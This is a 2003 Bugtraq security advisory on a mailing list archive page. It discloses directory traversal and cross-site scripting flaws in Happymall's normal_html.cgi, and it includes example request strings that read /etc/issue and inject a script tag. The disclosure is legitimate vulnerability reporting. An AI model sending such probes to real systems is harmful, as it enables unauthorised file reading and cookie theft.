[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030512161949.12041.qmail@www.securityfocus.com>
Date: 12 May 2003 16:19:49 -0000
From: Julio Cesar <e2fsck@....com.br>
To: bugtraq@...urityfocus.com
Subject: One more flaw in Happymall
Happymall E-Commerce Directory Transversal Bug and Cross-site scripting
Vendor: Happycgi.com
Product: Happymall
Versions: 4.3, 4.4 (patched version too)
'normal_html.cgi' doesn't filter user-supplied input. The well-known
directory transversal
and cross-site scripting (XSS) vulnerabilities are present in Happymall
(patched version too).
The impact is that attackers can read files on the system and use XSS
tricks to steal
cookies and other informations.
An example: /shop/normal_html.cgi?file=../../../../../../etc/issue%00
/shop/normal_html.cgi?file=<script>alert("XSS")</script>
Even happycgi.com is vulnerable to these bugs.
Solution: I have contacted CERTCC-KR.
Greetings: y0Rk, iplogd, rfds, VUGO, psaux, romer, cronus, Sh0dan, jo3y_,
psyc, Red_Hat BoLoDoRio, c7g, C0VER, SaintsLD, sarkastics, B_Real and
#xcorp @ BRASNet :)
Julio "e2fsck" Cesar, <e2fsck@....com.br>
e2fsck @ irc.brasnet.org
san dimas high school football rules
Powered by blists - more mailing lists